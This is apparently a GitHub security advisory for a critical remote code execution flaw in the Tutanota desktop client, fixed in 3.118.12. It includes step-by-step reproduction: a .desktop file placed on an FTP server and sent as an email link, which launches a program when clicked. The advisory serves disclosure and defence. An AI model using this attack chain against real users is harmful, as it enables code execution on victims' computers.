Skip to content

Remote Code Execution via insufficiently sanitized call to shell.openExternal

Critical
charlag published GHSA-mxgj-pq62-f644 Dec 15, 2023

Package

npm tutao/tutanota (npm)

Affected versions

<=3.118.8

Patched versions

3.118.12

Description

Summary

Tutanota allows users to open links in emails in external applications. It correctly blocks the file: URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as ftp:, smb:, etc. which can also be used.

Details

Steps to Reproduce

This PoC uses Ubuntu with the XFCE desktop environment, since it is least complicated to reproduce using this setup

  • Execute and authenticate to the Tutanota desktop version 3.118.8 AppImage on a Ubuntu Desktop with the XFCE environment.
    image
  • On another machine, host an FTP server with anonymous access enabled. Create and place a pwn.desktop file in the FTP root, with the following content:
[Desktop Entry]
Exec=xcalc
Type=Application
  • Send an email to the email account logged in on tutanota containing a hyperlink pointing to the pwn.desktop file on the FTP server. Replace the corresponding values in the hyperlink: ftp://username:password@ip-address/pwn.desktop.
    image
  • On the tutanota desktop application, click on the hyperlink in the email received. Observe that the calculator application opens. You may need to confirm execution of the application in some cases.

PoC

Impact

Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victims computer.

References

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

CVE ID

CVE-2023-46116

Weaknesses

Credits